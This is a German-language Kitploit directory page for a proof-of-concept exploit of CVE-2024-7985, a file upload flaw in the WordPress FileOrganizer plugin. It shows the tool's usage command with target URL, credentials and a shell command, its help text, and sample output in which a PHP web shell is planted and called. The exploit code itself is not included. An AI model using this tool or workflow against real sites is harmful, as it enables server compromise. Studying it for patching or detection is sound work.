Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - Authentifiziert (Subscriber+) Beliebiger Dateiupload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-7985-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Authentifiziert (Subscriber+) Beliebiger Dateiupload

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload

FileOrganizer Exploit - CVE-2024-7985

📌 Übersicht

CVE-2024-7985 - WordPress Plugin FileOrganizer <= 1.0.9 ist anfällig für authentifizierte beliebige Datei-Uploads, die es Angreifern mit Subscriber+-Rechten ermöglicht, schädliche Dateien aus der Ferne hochzuladen und auszuführen. Diese Schwachstelle entsteht durch fehlende Dateitypprüfung in der Funktion fileorganizer_ajax_handler, was Remote Code Execution (RCE) ermöglicht.

🚨 Dieser Exploit erlaubt es Angreifern, beliebige Befehle auf dem Server auszuführen! 🚨

⚡ Funktionen

  • ✅ Automatisiert den Angriff - Login, Nonce abrufen, ausnutzen.
  • ✅ Umgeht Sicherheitsprüfungen durch Nutzung authentifizierter Benutzerrechte.
  • ✅ Automatische Versionserkennung - Stellt sicher, dass das Ziel verwundbar ist.
  • ✅ Benutzerdefinierte Befehlsausführung - Der Benutzer kann jeden Befehl angeben.
  • ✅ Behandelt SSL-Überprüfungsprobleme nahtlos.

🛠️ Voraussetzungen

  • Python 3
  • requests
  • beautifulsoup4

Abhängigkeiten installieren:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Verwendung

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 Verwendung - Hilfe

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

Beispielausgabe:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 Exploit-Ablauf

1️⃣ Versionsprüfung - Stellt fest, ob die Website verwundbar ist.
2️⃣ Authentifizierung - Meldet sich bei WordPress an.
3️⃣ Nonce-Extraktion - Ruft das Sicherheitstoken ab.
4️⃣ Datei-Upload - Lädt ein schädliches PHP-Skript hoch.
5️⃣ Befehlsausführung - Führt benutzerdefinierte Befehle aus.


📌 Haftungsausschluss

Dieses Skript dient nur zu Bildungszwecken; der Autor übernimmt keine Verantwortung für Missbrauch oder Folgen. 🚨

Tool herunterladen